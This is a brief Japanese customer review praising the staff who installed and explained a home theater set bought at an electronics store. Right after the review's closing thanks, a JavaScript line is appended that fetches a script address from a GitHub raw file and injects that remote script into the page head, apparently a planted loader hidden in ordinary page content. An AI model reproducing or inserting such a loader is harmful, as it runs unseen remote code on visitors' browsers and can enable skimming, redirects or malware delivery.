家電量販店で購入したシアターセットのセッティングをお願いしました。
音響にお詳しいスタッフの方が対応してくれたので、安心でした。
接続方法や使い方を教えてくれたので、自分でも使いこなせそうです。
ありがとうございました。
;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});